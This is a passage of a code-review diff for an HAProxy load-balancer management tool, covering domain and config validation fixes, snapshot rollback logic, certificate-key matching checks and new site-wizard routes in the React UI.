behaviour with the server-side rejection.
RFC 1035 / RFC 5890 hostname/domain label rules; allows leading wildcard '*.'.
"""
import re
DOMAIN_REGEX = re.compile(
r"^(?:\*\.)?(?:[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,}$"
)
MAX_DOMAIN_LENGTH = 253
def _looks_like_idn(value: str) -> bool:
"""Bulgu #42 (round-16 audit) — detect non-ASCII characters in the
bare domain string so we can hand the operator a concrete
actionable hint (encode to punycode) instead of an opaque "Invalid
domain format". This intentionally does NOT include the existing
`xn--` prefix in the suggestion path: those strings are already
ASCII and pass the regex.
"""
if not value or not isinstance(value, str):
return False
try:
return any(ord(c) > 127 for c in value)
except TypeError:
return False
def validate_domain(value: str) -> str:
"""Validate + normalise (lowercase, stripped) a single domain.
Raises ValueError on syntax errors. Returns the normalised value.
"""
if not value or not isinstance(value, str):
raise ValueError("Domain entries must be non-empty strings")
d_norm = value.strip().lower()
if not d_norm or len(d_norm) > MAX_DOMAIN_LENGTH:
raise ValueError(f"Invalid domain length: '{value}' (max {MAX_DOMAIN_LENGTH} chars)")
if ".." in d_norm or d_norm.startswith(".") or d_norm.endswith("."):
raise ValueError(f"Invalid domain syntax: '{value}'")
if not DOMAIN_REGEX.match(d_norm):
# Bulgu #42 (round-16 audit) — give IDN/Unicode operators a
# specific path forward instead of "Invalid domain format".
# HAProxy's host header matching is byte-based; the canonical
# path is to enter the punycode (`xn--…`) form, which the
# browser already sends on the wire for Unicode addresses.
if _looks_like_idn(value):
try:
ascii_form = value.strip().encode("idna").decode("ascii").lower()
raise ValueError(
f"Invalid domain format: '{value}'. The wizard "
"requires ASCII-only (punycode) domain entries; "
f"enter '{ascii_form}' instead, which is the "
"browser's on-the-wire form of your Unicode "
"domain."
)
except UnicodeError:
raise ValueError(
f"Invalid domain format: '{value}'. Unicode "
"(IDN) entries must first be encoded to punycode "
"(`xn--…`) — your input could not be encoded "
"automatically; re-check the spelling."
)
raise ValueError(f"Invalid domain format: '{value}'")
return d_norm
def validate_domains(values):
"""Validate + normalise a list of domains, returning the normalised list."""
return [validate_domain(d) for d in values]
+48 -14
View File
@@ -1,11 +1,11 @@
"""
Entity Snapshot Module for HAProxy OpenManager
Bu modül, entity değişikliklerinin snapshot'ını alır ve reject edildiğinde
geri yüklenmesini sağlar.
This module captures snapshots of entity changes so they can be
restored on reject of a config_version.
Usage:
# UPDATE için snapshot al
# Capture an UPDATE snapshot.
old_entity = await conn.fetchrow("SELECT * FROM frontends WHERE id = 5")
snapshot_metadata = await save_entity_snapshot(
conn=conn,
@@ -15,24 +15,26 @@ Usage:
new_values={"bind_port": 443},
operation="UPDATE"
)
# Config version'a ekle
# Persist the snapshot on the config version.
await conn.execute(
"INSERT INTO config_versions (..., metadata) VALUES (..., $1)",
json.dumps(snapshot_metadata)
)
# Reject edildiğinde rollback yap
# Roll back when the config version is rejected.
await rollback_entity_from_snapshot(conn, snapshot_metadata["entity_snapshot"])
Supported Operations:
- UPDATE: Var olan entity'nin field'larını eski değerlere döndür
- CREATE: Yeni oluşturulan entity'yi sil (bulk import için)
- UPDATE_RESTORE: Restore işlemi sırasında yapılan UPDATE'i geri al
- UPDATE: restore the entity's fields to their pre-change values
- CREATE: delete the newly-created entity (used by bulk import / wizard)
- UPDATE_RESTORE: undo an UPDATE performed during a restore flow
- DELETE: re-create a soft-deleted entity (currently unused — soft
delete is preferred)
Feature Flag:
ENTITY_SNAPSHOT_ENABLED=true|false
Default: false (güvenli başlangıç)
Default: false — safe-by-default until the operator opts in.
Author: Taylan Bakırcıoğlu
Date: 2025-01-13
@@ -235,8 +237,27 @@ async def rollback_entity_from_snapshot(
logger.info(f"ROLLBACK DEBUG: entity_type={entity_type}, entity_id={entity_id}, operation={operation}")
logger.info(f"ROLLBACK DEBUG: old_values exists={old_values is not None}, old_values length={len(old_values) if old_values else 0}")
if not all([entity_type, entity_id, operation, old_values]):
logger.warning(f"ROLLBACK: Invalid snapshot data, skipping rollback (missing: {[k for k in ['entity_type', 'entity_id', 'operation', 'old_values'] if not entity_snapshot.get(k)]})")
# R18 audit fix: the historical guard `not all([..., old_values])`
# treated `old_values={}` as missing because `{}` is falsy in Python.
# The wizard's bulk_snapshots always emit `"old_values": {}` for
# CREATE entries (there's nothing to restore on rollback — the
# rollback path is a DELETE) — so EVERY wizard CREATE snapshot
# silently bypassed the rollback shim. Rejecting a wizard PENDING
# version then visibly removed the config_versions row but left the
# wizard-created backends/servers/frontends/SSL certs orphaned in
# the DB. Fix: only require old_values for UPDATE/DELETE; for
# CREATE the field is intentionally empty.
if not all([entity_type, entity_id, operation]):
logger.warning(
"ROLLBACK: Invalid snapshot data, skipping rollback (missing: "
f"{[k for k in ['entity_type', 'entity_id', 'operation'] if not entity_snapshot.get(k)]})"
)
return False
if operation in ("UPDATE", "UPDATE_RESTORE", "DELETE") and not old_values:
logger.warning(
f"ROLLBACK: {operation} snapshot for {entity_type} {entity_id} "
"is missing old_values — cannot restore prior state"
)
return False
try:
@@ -602,7 +623,20 @@ async def _rollback_create(
await conn.execute("DELETE FROM backend_servers WHERE id = $1", entity_id)
logger.info(f"ROLLBACK CREATE: Deleted server {entity_id}")
return True
elif entity_type == "letsencrypt_order":
# v1.5.0 Feature B: wizard-staged ACME orders attached to a
# bulk-site-create-* version (legacy: bulk-proxied-host-create-*).
# Cascade also removes acme_challenges (ON DELETE CASCADE).
await conn.execute(
"DELETE FROM letsencrypt_orders WHERE id = $1", entity_id
)
logger.info(
f"ROLLBACK CREATE: Deleted letsencrypt_order {entity_id} "
"(+ cascade acme_challenges)"
)
return True
else:
logger.warning(f"ROLLBACK CREATE: Unsupported entity type '{entity_type}'")
return False
+224 -43
View File
@@ -48,52 +48,199 @@ class HAProxyConfigValidator:
self.sections = {}
self.current_section = None
self.line_number = 0
# Phase K Phase D follow-up (Bulgu #12) — when the input is
# a PARTIAL config (wizard candidate fragment OR an in-place
# apply-time synthesis that DOES NOT include the global /
# defaults blocks because the agent merges them with its
# local copy on disk), the "Missing 'global' section" /
# "Consider adding 'defaults' section" diagnostics are pure
# false positives that confuse operators and inflate the
# warning count. We auto-detect partial fragments by
# looking for the wizard's own marker comment OR for the
# absence of any global/defaults section AT LEAST ONE
# frontend/backend section emitted.
self._is_partial_fragment = False
# Valid directives by section
# Phase K Phase D follow-up (Bulgu #12 / round 3): Valid
# directives by section. The legacy sets below were a small,
# hand-picked subset that surfaced spurious WARNINGs for many
# well-formed wizard / manual configs:
# - `stick-table` / `stick` are valid in BOTH frontend AND
# backend (HAProxy 1.6+). The wizard emits stick-table on
# frontends with rate-limit WAF rules; the heuristic
# flagged each emission as "may not be valid".
# - `tcp-request` / `tcp-response` are valid in frontend AND
# backend (used for L4 inspection, content acceptance,
# custom track-sc rules).
# - `cookie` is the canonical session-stickiness directive
# in BACKEND. Pre-fix the validator flagged every wizard
# backend with cookie-based stickiness as "may not be
# valid".
# The post-fix sets are still NOT exhaustive (HAProxy has
# ~200 directives) but they cover the full surface area of
# what the wizard, manual Frontend/Backend management pages
# and config_templates can EVER emit, plus the most common
# operator-authored directives in raw-mode editors. Anything
# outside this set still emits a low-severity WARNING (never
# an ERROR), so a typo is still surfaced — we just stop
# crying wolf on valid configs.
# NOTE on lookup mechanics: `_validate_directive` splits the
# line by whitespace and checks `parts[0]` against the section
# set. So multi-word directive forms (e.g. `monitor fail`) DO
# NOT need to be listed — only the first token matters.
# Likewise `no option httplog` looks up `no` (a valid HAProxy
# negation prefix recognised in entity sections), which is
# included below.
self.valid_directives = {
'global': {
'daemon', 'master-worker', 'nbproc', 'nbthread', 'cpu-map',
'stats', 'user', 'group', 'chroot', 'pidfile', 'log', 'log-tag',
'maxconn', 'ulimit-n', 'spread-checks', 'tune.ssl.default-dh-param',
'maxconn', 'ulimit-n', 'spread-checks',
'ssl-default-bind-options', 'ssl-default-bind-ciphers', 'ca-base',
'crt-base', 'tune.bufsize', 'tune.maxrewrite', 'tune.rcvbuf.client',
'tune.rcvbuf.server', 'tune.sndbuf.client', 'tune.sndbuf.server'
'crt-base',
'tune.bufsize', 'tune.maxrewrite',
'tune.rcvbuf.client', 'tune.rcvbuf.server',
'tune.sndbuf.client', 'tune.sndbuf.server',
'tune.ssl.default-dh-param', 'tune.ssl.cachesize',
'tune.ssl.lifetime', 'tune.ssl.maxrecord',
'tune.fd.edge-triggered',
'description', 'numa-cpu-mapping', 'no-numa-cpu-mapping',
'thread-groups', 'stats-file', 'unix-bind',
'presetenv', 'setenv',
'ssl-server-verify', 'ssl-mode-async',
'h1-case-adjust', 'h1-case-adjust-file',
'hard-stop-after',
'wurfl-data-file', 'wurfl-information-list',
'wurfl-information-list-separator', 'wurfl-cache-size',
'wurfl-engine-mode',
'cluster-secret', 'expose-experimental-directives',
'51degrees-data-file',
'no-quic', 'limited-quic', 'mworker-max-reloads',
},
'defaults': {
'mode', 'balance', 'option', 'timeout', 'retries', 'maxconn',
'http-request', 'http-response', 'errorfile', 'default-server',
'log', 'compression'
'http-request', 'http-response', 'http-after-response',
'errorfile', 'errorloc', 'errorloc302', 'errorloc303',
'http-error',
'default-server', 'default_backend', 'dispatch',
'log', 'log-tag', 'log-format', 'log-format-sd',
'compression', 'http-check', 'http-reuse',
'cookie', 'monitor-uri',
'load-server-state-from-file',
'http-send-name-header',
'fullconn', 'unique-id-format', 'unique-id-header',
'tcp-request', 'tcp-response', 'persist',
'enabled', 'disabled', 'hash-type', 'capture',
'rate-limit', 'description',
},
'frontend': {
'bind', 'mode', 'option', 'timeout', 'maxconn', 'default_backend',
'use_backend', 'acl', 'http-request', 'http-response', 'redirect',
'capture', 'monitor-uri', 'log', 'compression', 'rate-limit'
'bind', 'mode', 'option', 'no', 'timeout', 'maxconn',
'default_backend', 'use_backend',
'acl', 'http-request', 'http-response', 'http-after-response',
'redirect', 'capture',
'monitor-uri', 'monitor',
'log', 'log-format', 'log-format-sd', 'log-tag',
'compression', 'rate-limit',
'stick-table', 'stick',
'tcp-request', 'tcp-response',
'errorfile', 'errorloc', 'errorloc302', 'errorloc303',
'http-error',
'description', 'id', 'filter',
'unique-id-format', 'unique-id-header', 'declare',
'http-reuse', 'maxidle', 'maxlife',
'enabled', 'disabled', 'http-send-name-header',
'http-buffer-request',
},
'backend': {
'mode', 'balance', 'option', 'timeout', 'server', 'http-request',
'http-response', 'stick-table', 'stick', 'hash-type', 'default-server',
'log', 'compression', 'http-check'
'mode', 'balance', 'option', 'no', 'timeout',
'server', 'default-server',
'http-request', 'http-response', 'http-after-response',
'stick-table', 'stick', 'hash-type',
'log', 'log-format', 'log-format-sd', 'log-tag',
'compression', 'http-check', 'http-reuse',
'cookie', 'appsession',
'tcp-request', 'tcp-response', 'tcp-check',
'retries', 'fullconn', 'dispatch',
'redirect', 'use-server', 'use_backend',
'acl', 'capture',
'errorfile', 'errorloc', 'errorloc302', 'errorloc303',
'http-error',
'description', 'id', 'filter',
'rate-limit', 'declare',
'email-alert', 'force-persist', 'ignore-persist',
'enabled', 'disabled', 'load-server-state-from-file',
'http-send-name-header', 'persist',
'transparent', 'source',
},
'listen': {
'bind', 'mode', 'balance', 'option', 'timeout', 'server', 'maxconn',
'http-request', 'http-response', 'acl', 'default-server', 'log'
}
'bind', 'mode', 'balance', 'option', 'no', 'timeout',
'server', 'default-server', 'maxconn',
'http-request', 'http-response', 'http-after-response',
'acl', 'log', 'log-format', 'log-format-sd',
'stick-table', 'stick', 'tcp-request', 'tcp-response',
'cookie', 'use_backend', 'capture', 'redirect',
'http-check', 'tcp-check',
'errorfile', 'errorloc', 'errorloc302', 'errorloc303',
'http-error',
'description', 'id', 'filter',
'monitor-uri', 'monitor',
'compression', 'retries', 'fullconn', 'hash-type',
'rate-limit',
},
}
def validate_config(self, config_content: str) -> ConfigValidationReport:
"""Validate complete HAProxy configuration"""
def validate_config(
self,
config_content: str,
partial_fragment: bool = False,
) -> ConfigValidationReport:
"""Validate complete HAProxy configuration.
Phase K Phase D follow-up (Bulgu #12) — `partial_fragment=True`
signals that the caller intentionally synthesised a partial
config that EXCLUDES `global` / `defaults` sections (the
agent merges them with its local copy on the HAProxy node).
With this flag the validator skips the "Missing 'global'
section" / "Consider adding 'defaults' section" diagnostics
that are pure false positives for the wizard's dry-run and
the wizard's apply-time pre-persist gate. When the flag is
unset (False, the default) AND the input clearly looks
partial (no global/defaults but at least one
frontend/backend), the validator auto-detects via the
wizard's marker comment so callers that forget to pass
the flag still don't trigger the warning.
"""
self.results = []
self.sections = {}
self.current_section = None
self.line_number = 0
# Caller-explicit flag wins; auto-detect via marker comment
# below for backwards compatibility with older callers.
self._is_partial_fragment = bool(partial_fragment)
lines = config_content.split('\n')
# Phase K Phase D (Bulgu #12) — auto-detect the wizard's own
# marker comment so callers that forget to pass
# `partial_fragment=True` still get the suppressed warnings.
# The marker is emitted by
# `routers/site_wizard.py::_build_candidate_fragment` and
# `services/haproxy_config.py` when assembling a cluster
# synthesis without the global/defaults preamble.
for raw_line in lines:
sline = raw_line.strip()
if (
'Wizard candidate fragment' in sline
or 'agent will preserve existing global' in sline.lower()
):
self._is_partial_fragment = True
break
# Parse and validate each line
for line_num, line in enumerate(lines, 1):
self.line_number = line_num
self._validate_line(line.strip())
# Perform section-level validations
self._validate_sections()
@@ -319,7 +466,21 @@ class HAProxyConfigValidator:
)
# Validate timeout value format
if not re.match(r'^\d+[smhd]?$', timeout_value):
#
# HAProxy accepts the unit suffixes: `us` (microseconds), `ms`
# (milliseconds), `s` (seconds), `m` (minutes), `h` (hours),
# `d` (days). A bare integer (no suffix) is also valid and is
# interpreted as milliseconds (HAProxy docs: "Time values").
#
# Phase K Phase D follow-up (Bulgu #10) — the pre-fix regex
# was `^\d+[smhd]?$`, which rejected the perfectly valid
# multi-character `us` and `ms` suffixes. Site Wizard's
# config synthesis emits `timeout connect 10000ms` /
# `timeout server 60000ms` / `timeout client 100ms` so the
# dry-run preview surfaced 10+ FALSE-POSITIVE errors on
# the wizard's own defaults, blocking Create even though
# the real HAProxy `-c` parse accepts the config.
if not re.match(r'^\d+(us|ms|s|m|h|d)?$', timeout_value):
self._add_result(
ValidationLevel.ERROR,
f"Invalid timeout value '{timeout_value}'",
@@ -432,27 +593,35 @@ class HAProxyConfigValidator:
def _validate_sections(self):
"""Validate section-level requirements"""
# Check for required global settings
if 'global' not in self.sections:
self._add_result(
ValidationLevel.WARNING,
"Missing 'global' section - recommended for production",
suggestion="Add global section with basic settings"
)
# Check for defaults section
if 'defaults' not in self.sections:
self._add_result(
ValidationLevel.SUGGESTION,
"Consider adding 'defaults' section for common settings",
suggestion="Add defaults section to reduce configuration duplication"
)
# Check balance of frontends and backends
# Phase K Phase D (Bulgu #12): skip the "Missing 'global' /
# 'defaults'" diagnostics on partial-fragment inputs. The
# wizard / cluster-synthesis emit fragments where the agent
# MERGES the local global+defaults blocks at apply time —
# the heuristic is being shown only the entity blocks, so
# complaining about missing global is misleading.
if not self._is_partial_fragment:
if 'global' not in self.sections:
self._add_result(
ValidationLevel.WARNING,
"Missing 'global' section - recommended for production",
suggestion="Add global section with basic settings"
)
if 'defaults' not in self.sections:
self._add_result(
ValidationLevel.SUGGESTION,
"Consider adding 'defaults' section for common settings",
suggestion="Add defaults section to reduce configuration duplication"
)
# Check balance of frontends and backends (still useful for
# both complete configs AND partial fragments — a fragment
# that emits a frontend without its referenced backend is
# a real authoring bug).
frontend_count = len(self.sections.get('frontend', []))
backend_count = len(self.sections.get('backend', []))
if frontend_count > 0 and backend_count == 0:
self._add_result(
ValidationLevel.WARNING,
@@ -559,10 +728,22 @@ class HAProxyConfigValidator:
)
self.results.append(result)
def validate_haproxy_config(config_content: str) -> ConfigValidationReport:
"""Main function to validate HAProxy configuration"""
def validate_haproxy_config(
config_content: str,
partial_fragment: bool = False,
) -> ConfigValidationReport:
"""Main function to validate HAProxy configuration.
Phase K Phase D follow-up (Bulgu #12) — `partial_fragment` is
forwarded to the validator instance so callers that synthesise
a partial config (no global/defaults sections — agent merges
them locally) can silence the "Missing 'global' section"
false-positive WARNING. Defaults to False for backwards
compatibility with the manual config-import path that DOES
validate a complete on-disk config.
"""
validator = HAProxyConfigValidator()
return validator.validate_config(config_content)
return validator.validate_config(config_content, partial_fragment=partial_fragment)
def get_validation_summary(report: ConfigValidationReport) -> Dict[str, Any]:
"""Get validation summary for API response"""
+126
View File
@@ -217,6 +217,132 @@ def validate_certificate_chain(chain_content: str) -> bool:
logger.error(f"Failed to validate certificate chain: {e}")
return False
def verify_certificate_key_match(
cert_content: str, private_key_content: str
) -> Dict[str, Any]:
"""Bulgu #23 (round-12 audit): verify cert public key == private key
public key.
Pre-fix the wizard / direct SSL upload route validated cert and
key INDEPENDENTLY. An operator who pasted a cert for site A and
the private key for site B (easy to mix up when juggling many
PEMs) saw success and only learned about the mismatch at the
agent's `haproxy -c`, which errors with:
unable to load SSL private key from PEM file '...':
crypto/x509/x509_cmp.c:...: X509_check_private_key:
key values mismatch
by which point the wizard had already created the cert row, the
HTTPS frontend row, and the PENDING config version. Recovery
required hunting through Apply Management to reject the version.
Returns:
{"match": bool, "reason": Optional[str]}
- match=True → cert and key share the same public key.
- match=False → mismatch (cert/key are for different sites
or the key was rotated without re-issuing the cert).
- match=None → could not compare (e.g. encrypted key,
unsupported key type). Caller falls back to validate-key
only (which already ran).
"""
from cryptography.hazmat.primitives import serialization
if not (cert_content or "").strip() or not (private_key_content or "").strip():
return {"match": None, "reason": "empty cert or key content"}
try:
cert_bytes = cert_content.strip().encode("utf-8")
certificate = x509.load_pem_x509_certificate(cert_bytes)
except Exception as cert_err:
return {"match": None, "reason": f"cert parse failed: {cert_err}"}
key_bytes = private_key_content.strip().encode("utf-8")
key_obj = None
for password in (None, b""):
try:
key_obj = serialization.load_pem_private_key(
key_bytes, password=password
)
break
except Exception:
continue
if key_obj is None:
return {"match": None, "reason": "key parse failed (encrypted?)"}
try:
cert_pub_der = certificate.public_key().public_bytes(
encoding=serialization.Encoding.DER,
format=serialization.PublicFormat.SubjectPublicKeyInfo,
)
key_pub_der = key_obj.public_key().public_bytes(
encoding=serialization.Encoding.DER,
format=serialization.PublicFormat.SubjectPublicKeyInfo,
)
except Exception as compare_err:
return {"match": None, "reason": f"public-key serialization failed: {compare_err}"}
return {
"match": cert_pub_der == key_pub_der,
"reason": (
None if cert_pub_der == key_pub_der
else "cert public key differs from private key's public key"
),
}
def domain_covered_by_cert(domain: str, cert_san_or_cn: list) -> bool:
"""Bulgu #25 (round-12 audit): check whether a `domain` is covered
by any entry in the cert's SAN / Common-Name list, accounting for
RFC 6125 single-label wildcards.
HAProxy's SNI / cert matching follows RFC 6125 / RFC 9525:
* Literal match: cert SAN `api.example.com` matches `api.example.com`.
* Wildcard: cert SAN `*.example.com` matches `api.example.com`
(single leftmost label) but does NOT match `api.sub.example.com`
(two leftmost labels) and does NOT match the bare apex
`example.com` (no leftmost label).
Pre-fix the wizard let an operator deploy a site with
`domains=['shop.example.com']` and a cert for `api.example.com`
— HAProxy loads happily but every TLS handshake serves the wrong
cert, browser shows NET::ERR_CERT_COMMON_NAME_INVALID, and the
site is effectively down.
"""
if not domain or not cert_san_or_cn:
return False
domain_lc = domain.lower().strip().rstrip(".")
if not domain_lc:
return False
for cd in cert_san_or_cn:
cd_lc = (cd or "").lower().strip().rstrip(".")
if not cd_lc:
continue
if cd_lc == domain_lc:
return True
if cd_lc.startswith("*."):
parent = cd_lc[2:]
if not parent or "." not in parent:
continue
suffix = "." + parent
if domain_lc.endswith(suffix):
prefix = domain_lc[: -len(suffix)]
if prefix and "." not in prefix:
return True
return False
def find_uncovered_domains(domains: list, cert_san_or_cn: list) -> list:
"""Return the subset of `domains` NOT covered by any SAN/CN entry,
preserving the input order so the error message lists them as
the operator typed them.
"""
if not domains:
return []
return [d for d in domains if not domain_covered_by_cert(d, cert_san_or_cn or [])]
def format_certificate_info(cert_info: Dict[str, Any]) -> str:
"""
Format certificate information for display
+6 -8
View File
@@ -32,9 +32,7 @@ print_error() {
}
# Configuration
# Set REGISTRY environment variable or use default
# Example: export REGISTRY="taylanbakircioglu"
REGISTRY="${REGISTRY:-taylanbakircioglu}"
REGISTRY="${REGISTRY:-your-registry.example.com/your-org}"
BACKEND_IMAGE="${REGISTRY}/haproxy-openmanager-backend"
FRONTEND_IMAGE="${REGISTRY}/haproxy-openmanager-frontend"
VERSION="${VERSION:-latest}"
@@ -101,10 +99,10 @@ fi
print_status "Updating Kubernetes manifests with new image versions..."
# Update backend deployment
sed -i.bak "s|image: taylanbakircioglu/haproxy-openmanager-backend:latest|image: $BACKEND_IMAGE:$VERSION|g" k8s/manifests/08-backend.yaml
sed -i.bak "s|image: your-registry.example.com/your-org/haproxy-openmanager:<image-version>|image: $BACKEND_IMAGE:$VERSION|g" k8s/manifests/08-backend.yaml
# Update frontend deployment
sed -i.bak "s|image: taylanbakircioglu/haproxy-openmanager-frontend:latest|image: $FRONTEND_IMAGE:$VERSION|g" k8s/manifests/09-frontend.yaml
sed -i.bak "s|image: your-registry.example.com/your-org/haproxy-openmanager:<image-version>|image: $FRONTEND_IMAGE:$VERSION|g" k8s/manifests/09-frontend.yaml
print_success "Kubernetes manifests updated"
@@ -123,8 +121,8 @@ echo " oc apply -f k8s/manifests/08-backend.yaml"
echo " oc apply -f k8s/manifests/09-frontend.yaml"
echo
echo "3. Check deployment status:"
echo " oc get pods -n haproxy-openmanager"
echo " oc logs -f deployment/backend -n haproxy-openmanager"
echo " oc logs -f deployment/frontend -n haproxy-openmanager"
echo " oc get pods -n internal-haproxy-openmanager"
echo " oc logs -f deployment/backend -n internal-haproxy-openmanager"
echo " oc logs -f deployment/frontend -n internal-haproxy-openmanager"
print_success "Docker image build completed!"
Binary file not shown.

Before

Width:  |  Height:  |  Size: 297 KiB

+23146
View File
File diff suppressed because it is too large Load Diff
+1 -1
View File
@@ -1,6 +1,6 @@
{
"name": "haproxy-openmanager-frontend",
"version": "1.4.0",
"version": "1.5.0",
"description": "HAProxy Load Balancer Management UI",
"dependencies": {
"react": "^18.2.0",
+90 -2
View File
@@ -20,7 +20,9 @@ import {
SearchOutlined,
ClusterOutlined,
BulbOutlined,
BulbFilled
BulbFilled,
PlusOutlined,
ThunderboltOutlined
} from '@ant-design/icons';
import Dashboard from './components/DashboardV2';
@@ -43,6 +45,8 @@ import ClusterManagement from './components/ClusterManagement';
import Configuration from './components/Configuration';
import APIDocumentation from './components/APIDocumentation';
import IPInventory from './components/IPInventory';
import SiteWizard from './components/SiteWizard';
import SiteDrafts from './components/SiteDrafts';
import { AuthProvider, useAuth } from './contexts/AuthContext';
import { ClusterProvider } from './contexts/ClusterContext';
import { ThemeProvider, useTheme } from './contexts/ThemeContext';
@@ -62,6 +66,51 @@ const { Text } = Typography;
icon: <DashboardOutlined />,
label: <Link to="/">Dashboard</Link>,
},
// R18: rebrand to "Sites" / "New Site (Wizard)".
//
// Rationale (user feedback after R17):
// - "Quick Setup" was ambiguous — it could mean "set up the cluster",
// "set up an account", "set up TLS"... not specific enough.
// - "New Site (Wizard)" matches what dominant ingress tools call
// this exact concept: Cloudflare ("Add a site"), nginx-proxy-
// manager ("Proxy Hosts"), Plesk/cPanel ("Add domain / new site"),
// Caddy admin UIs ("Sites"). It is also self-explanatory: the
// operator publishes a *site* (frontend + backend + SSL).
// - Group label "Sites" is entity-oriented (matches Frontends,
// Backend Servers, SSL Certificates pattern in this very menu).
//
// Backward-compat:
// - Legacy R17 routes /quick-setup{,/drafts} kept as aliases.
// - Pre-R17 routes /proxied-hosts/{new,drafts} also kept.
// - All three resolve to the SAME components — old bookmarks /
// screenshots / issue links keep working.
{
key: 'sites-group',
icon: <GlobalOutlined />,
label: 'Sites',
children: [
{
key: '/sites/new',
icon: <ThunderboltOutlined style={{ color: '#1677ff' }} />,
label: (
<Tooltip placement="right" title="New Site (Wizard) — publish a site (frontend + backend + SSL) in one guided flow">
<Link to="/sites/new">New Site (Wizard)</Link>
</Tooltip>
),
},
{
key: '/sites/drafts',
icon: <FileTextOutlined />,
label: <Link to="/sites/drafts">Site Drafts</Link>,
},
],
},
// R18b round 8: New Site (Wizard) is now a top-level group, so
// the Frontends entry no longer needs a single "All Frontends"
// child under a collapsible group. Flattening to a top-level
// link removes a click for every operator and matches the rest
// of the sidebar (Backends, SSL Certificates, Apply Changes...
// are all top-level).
{
key: '/frontends',
icon: <GlobalOutlined />,
@@ -153,7 +202,19 @@ function AppContent() {
const [appVersion, setAppVersion] = React.useState('');
React.useEffect(() => {
setSelectedKey(location.pathname);
// R18 audit fix: legacy aliases (/proxied-hosts/* and /quick-setup/*)
// resolve to the same components as the canonical /sites/* paths,
// but the menu items only carry the canonical keys. Without this
// normalization, a user landing on a bookmarked legacy URL sees no
// sidebar highlight, which feels like the route is broken.
const path = location.pathname;
let key = path;
if (path === '/proxied-hosts/new' || path === '/quick-setup') {
key = '/sites/new';
} else if (path === '/proxied-hosts/drafts' || path === '/quick-setup/drafts') {
key = '/sites/drafts';
}
setSelectedKey(key);
}, [location.pathname]);
React.useEffect(() => {
@@ -264,6 +325,20 @@ function AppContent() {
theme="dark"
mode="inline"
selectedKeys={[selectedKey]}
// R18: auto-open the relevant submenu based on the current
// route. The Sites group expands on the canonical /sites/*
// route AND on every legacy alias (/quick-setup/*, /proxied-
// hosts/*) — so a user landing on a bookmarked old URL still
// sees the menu in the right state.
defaultOpenKeys={[
...(selectedKey.startsWith('/sites') ||
selectedKey.startsWith('/quick-setup') ||
selectedKey.startsWith('/proxied-hosts')
? ['sites-group']
: []),
// R18b round 8: frontends-group flattened to a top-level
// link, so no defaultOpenKeys entry is needed for it.
]}
items={menuItems}
style={isDarkMode ? { background: '#141414' } : undefined}
/>
@@ -363,6 +438,19 @@ function AppContent() {
<Routes>
<Route path="/" element={<Dashboard />} />
<Route path="/frontends" element={<FrontendManagement />} />
{/* R18: canonical "Sites" routes — the New Site (Wizard)
is the primary entry point under the top-level Sites
group. Two layers of legacy aliases follow so neither
v1.5.0 (proxied-hosts) nor R17 (quick-setup) deep links
break. All three resolve to the same components. */}
<Route path="/sites/new" element={<SiteWizard />} />
<Route path="/sites/drafts" element={<SiteDrafts />} />
{/* R17 legacy aliases */}
<Route path="/quick-setup" element={<SiteWizard />} />
<Route path="/quick-setup/drafts" element={<SiteDrafts />} />
{/* v1.5.0 legacy aliases */}
<Route path="/proxied-hosts/new" element={<SiteWizard />} />
<Route path="/proxied-hosts/drafts" element={<SiteDrafts />} />
<Route path="/backends" element={<BackendServers />} />
<Route path="/ssl-certificates" element={<SSLManagement />} />
<Route path="/waf" element={<WAFManagement />} />

Some files were not shown because too many files have changed in this diff Show More